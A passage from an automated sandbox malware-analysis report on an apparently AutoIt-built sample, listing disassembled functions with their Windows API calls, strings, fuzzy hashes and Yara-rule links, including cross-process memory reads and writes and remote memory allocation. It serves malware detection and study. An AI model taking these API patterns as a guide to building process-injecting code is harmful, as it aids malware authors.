CoCreateInstance.OLE32(00F32D6C,00000000,00000001,00F32BDC,?), ref: 00F0C44A

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

CoUninitialize.OLE32 ref: 00F0C6B7

Strings

.lnk, xrefs: 00F0C3C6, 00F0C3EE, 00F0C3F8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 2c09143cf0909aae1e00ea7a6943c6d9cec577534db0a4a1682da53aadde8495
Instruction ID: c52c1c8e54e7fdaf3c30f6ddfab001d571e02ef49ba508c5c5bc64444458cf0e
Opcode Fuzzy Hash: 2c09143cf0909aae1e00ea7a6943c6d9cec577534db0a4a1682da53aadde8495
Instruction Fuzzy Hash: CFA13C71104205AFD700EF54CC81EABB7E8FF8A354F004A2CF195AB1A2DB71E949CB62

Function 00EB2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00EC0DB6: std::exception::exception.LIBCMT ref: 00EC0DEC
Part of subcall function 00EC0DB6: __CxxThrowException@8.LIBCMT ref: 00EC0E01

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Part of subcall function 00EA7A51: _memmove.LIBCMT ref: 00EA7AAB

__swprintf.LIBCMT ref: 00EB2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EB2D66

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: b5fec51d862527d8a91cef71b11cb75c36152782f4a6fa2aae3dc96b918e5640
Instruction ID: 8debee1e34877edbad7c001f016c8093fc5d73122d8058473d6294cfcba920a1
Opcode Fuzzy Hash: b5fec51d862527d8a91cef71b11cb75c36152782f4a6fa2aae3dc96b918e5640
Instruction Fuzzy Hash: FC917A721082059FC714EF24C885DAFB7E8EF9A354F00691DF586BB2A1EA20ED45CB52

Function 00F0B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EA4743,?,?,00EA37AE,?), ref: 00EA4770

CoInitialize.OLE32(00000000), ref: 00F0B9BB
CoCreateInstance.OLE32(00F32D6C,00000000,00000001,00F32BDC,?), ref: 00F0B9D4
CoUninitialize.OLE32 ref: 00F0B9F1

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

Strings

.lnk, xrefs: 00F0B99D, 00F0B9AB

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: cc9527dd1059dcf18505eb05e59828c3506c4505cf3d9d1f7c794958d0b4f4bc
Instruction ID: 2bde95fd61dffabb255ca0a21ceff378a65a67ded9ceaa7e9d2b56e067b6a679
Opcode Fuzzy Hash: cc9527dd1059dcf18505eb05e59828c3506c4505cf3d9d1f7c794958d0b4f4bc
Instruction Fuzzy Hash: 58A16A756043059FCB14DF14C884D6ABBE5FF8A324F148958F899AB3A2CB31EC45DB91

Function 00EC501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00EC50AD

Part of subcall function 00ED00F0: __87except.LIBCMT ref: 00ED012B

Strings

pow, xrefs: 00EC5085, 00EC50A2

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 4065b277c65f47230902a64d52ee71f462d5450a1cd2eb934262b5eb70ef090e
Instruction ID: 9f74122fd7adc01da2ddfb14ff8314a8cb16e6fe843b50daab6413c77074ef16
Opcode Fuzzy Hash: 4065b277c65f47230902a64d52ee71f462d5450a1cd2eb934262b5eb70ef090e
Instruction Fuzzy Hash: CB51E26290EA0586C7117714CE067AE3BD0EB40314F28BD5EE4D1E63AADF359DC79A82

Function 00EE8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EE862B
_memmove.LIBCMT ref: 00EE8685

Strings

3c, xrefs: 00EE860C
_, xrefs: 00EE86FF, 00EEDFDC, 00EEDFF8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove
String ID: 3c$_
API String ID: 4104443479-4099079164
Opcode ID: ce118eafca4cf3cb08606b341c45d59e5af0b276de3b9ea61b85610abfe08703
Instruction ID: 7595436809c1a003f01f65041f2630e3438c0bb27c934744faaaf94fbe65f284
Opcode Fuzzy Hash: ce118eafca4cf3cb08606b341c45d59e5af0b276de3b9ea61b85610abfe08703
Instruction Fuzzy Hash: D6515DB0A00649DFCF24CF69C980AEEB7F1FF44314F248529E85AE7251EB31A955CB51

Function 00EF97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F014BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EF9296,?,?,00000034,00000800,?,00000034), ref: 00F014E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EF983F

Part of subcall function 00F01487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EF92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F014B1

Part of subcall function 00F013DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F01409
Part of subcall function 00F013DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EF925A,00000034,?,?,00001004,00000000,00000000), ref: 00F01419
Part of subcall function 00F013DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EF925A,00000034,?,?,00001004,00000000,00000000), ref: 00F0142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EF98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EF98F9

Strings

@, xrefs: 00EF9911

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 1315d6a2931d84dae960c9c95ba627ff918979b92749cc127daa00dc2af02765
Instruction ID: b40700013915eff7fe38ab793938b1557c3d90d31d98e33233d5820848b8642b
Opcode Fuzzy Hash: 1315d6a2931d84dae960c9c95ba627ff918979b92749cc127daa00dc2af02765
Instruction Fuzzy Hash: BD41507690121CAFDB20DFA4CC81EEEBBB8EB45300F104099FA55B7191DA746E49DBA0

Function 00F27946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F2F910,00000000,?,?,?,?), ref: 00F279DF
GetWindowLongW.USER32 ref: 00F279FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F27A0C

Strings

SysTreeView32, xrefs: 00F279B1

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e8e23b8b66c05f586aeeb01717e803149c6b5e2f13120b7f0037a89044dc216e
Instruction ID: 0f7f001b3c09e43cbad86016e270493f676d3ccfc2e96951a605734c03ebdcd9
Opcode Fuzzy Hash: e8e23b8b66c05f586aeeb01717e803149c6b5e2f13120b7f0037a89044dc216e
Instruction Fuzzy Hash: 6B31DE3160431AABDB119E38EC41BEB77A9FB09334F244725F975A22E0D734ED91AB50

Function 00F273D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F27461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F27475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F27499

Strings

SysMonthCal32, xrefs: 00F2742C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: f08bd9bf045ca01efc44ccaeadc98f5169c1fcbde70fa62a8c3f644f38569ba4
Instruction ID: e5e25cdd723c428db8f98753414eb0418627d9a015afe791adaf4789ad363858
Opcode Fuzzy Hash: f08bd9bf045ca01efc44ccaeadc98f5169c1fcbde70fa62a8c3f644f38569ba4
Instruction Fuzzy Hash: 8421E132500228ABDF11EE54DC42FEA3B79EB48724F110114FE146B1D0DAB5AC55ABA0

Function 00F27B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F27C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F27C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F27C5F

Strings

msctls_updown32, xrefs: 00F27BC4

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 1682fe040d209c0c57b6554620d8afbcc68323eb9c06220109845983360051c0
Instruction ID: 54883dd37453815036cbb9253f25349599d1b31e394687402a3a581dab95c937
Opcode Fuzzy Hash: 1682fe040d209c0c57b6554620d8afbcc68323eb9c06220109845983360051c0
Instruction Fuzzy Hash: AC2181B5604219AFDB10EF24DCC1D6737ECEF4A764B140059FA11AB361CB71EC11ABA0

Function 00F26CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F26D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F26D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F26D70

Strings

Listbox, xrefs: 00F26D08

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a210ef29092218a4da0004d0180a97ab2b88f75dd222dcb92b781bbc28f92352
Instruction ID: 3eaebc534e01b81c7e22cc1609efe0674fd234ac1b3cba507af519f3f17cdaea
Opcode Fuzzy Hash: a210ef29092218a4da0004d0180a97ab2b88f75dd222dcb92b781bbc28f92352
Instruction Fuzzy Hash: A521C93265012CBFDF119F54DC45FBB3BBAEF89760F418124F9459B190C6719C51A7A0

Function 00F2770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F27772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F27787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F27794

Strings

msctls_trackbar32, xrefs: 00F27749

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 5b5a002abff0d6bb83fd943289122e18c16e760140eb5fca9f0bb072f33508db
Instruction ID: ddfe44e5d086f35af1bcf09488f0dec893c18ac58bc0344289e20cd431f6a502
Opcode Fuzzy Hash: 5b5a002abff0d6bb83fd943289122e18c16e760140eb5fca9f0bb072f33508db
Instruction Fuzzy Hash: D9113A32604309BFEF206F60DC05FD737A8EF89B64F010128FA41A6090C671E811EB10

Function 00EA4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00EA4B83,?), ref: 00EA4C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EA4C56

Strings

kernel32.dll, xrefs: 00EA4C3F
Wow64RevertWow64FsRedirection, xrefs: 00EA4C50

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 4fa7fc8898fecd216dc148adeed7b3545f4c1481c84d1bb87963010df4b53a49
Instruction ID: 919c5ab116bf20fe53bd8d8843d1b3aa9f8e555da5da953c3c52e7632729819e
Opcode Fuzzy Hash: 4fa7fc8898fecd216dc148adeed7b3545f4c1481c84d1bb87963010df4b53a49
Instruction Fuzzy Hash: 51D02B70520713CFD7304F31D908206B3F4AF09759F10C83ED495DA1A0E7B0E484D611

Function 00EA4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00EA4BD0,?,00EA4DEF,?,00F652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EA4C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EA4C23

Strings

kernel32.dll, xrefs: 00EA4C0C
Wow64DisableWow64FsRedirection, xrefs: 00EA4C1D

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 3ec49bcef08949fbd8e5f369facdf5417f249b40cba9696c6493838cef2cc4e7
Instruction ID: 4af4c57ab34e803994df26ccf71b334220ca77b67aa47176dca9785c4cdd475a
Opcode Fuzzy Hash: 3ec49bcef08949fbd8e5f369facdf5417f249b40cba9696c6493838cef2cc4e7
Instruction Fuzzy Hash: C0D0C270520713CFD7206F70D908207B6E5EF4D75AB008C3A9486DA190E6B0E484D611

Function 00F20DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00F21039), ref: 00F20DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F20E07

Strings

RegDeleteKeyExW, xrefs: 00F20E01
advapi32.dll, xrefs: 00F20DF0

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 4fb2dac5359d839dcfe8b9382575a854c55e007f878a39e1c83a086504c099d1
Instruction ID: 208f3afae6b8ea8bcdebea2215e5a3322baddcee389e5fd488e5da864619ee69
Opcode Fuzzy Hash: 4fb2dac5359d839dcfe8b9382575a854c55e007f878a39e1c83a086504c099d1
Instruction Fuzzy Hash: 2ED0C731820B26CFC3208F70D808282B2E5AF04362F068C3E9982E2151EAB4D8E4EA00

Function 00F190E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F18CF4,?,00F2F910), ref: 00F190EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F19100

Strings

kernel32.dll, xrefs: 00F190E9
GetModuleHandleExW, xrefs: 00F190FA

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: d1698901655afb4d2a0d15da0d3fcbb15a04103154eddb295df009e6bb8b9997
Instruction ID: f72d01d7ae174422078705248a546f5b11e54a48f7a1e04c3aab96b84e4e0ee6
Opcode Fuzzy Hash: d1698901655afb4d2a0d15da0d3fcbb15a04103154eddb295df009e6bb8b9997
Instruction Fuzzy Hash: B0D0C230920313DFC7208F30D81824272E5AF04351B05883A9482E6150E6B0C4C4E690

Function 00EE1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00EE1718
__swprintf.LIBCMT ref: 00EE1749

Strings

WIN_XPe, xrefs: 00EE1788
%.3d, xrefs: 00EE1723

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: e7b916fe489913d14d0f93a8ec39bf7d6a6f47e34fc83fb732670a42a7489b7d
Instruction ID: 4a659007e933719599ab56cf9d831718997feda1e0ae989655a410198fd93b14
Opcode Fuzzy Hash: e7b916fe489913d14d0f93a8ec39bf7d6a6f47e34fc83fb732670a42a7489b7d
Instruction Fuzzy Hash: 6BD0127180425CEAC714DA919888CFD777CA70AB02F1024A3B502B2140E23197D5E621

Function 00EF717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0739d75cf469e5e8675fc496c5829f5ec0f6c150d315af783063e19121320913
Instruction ID: 084f1ace6b7ca6667a3437472b58144c17803ec054b138d2d3c4a4f91e065c6f
Opcode Fuzzy Hash: 0739d75cf469e5e8675fc496c5829f5ec0f6c150d315af783063e19121320913
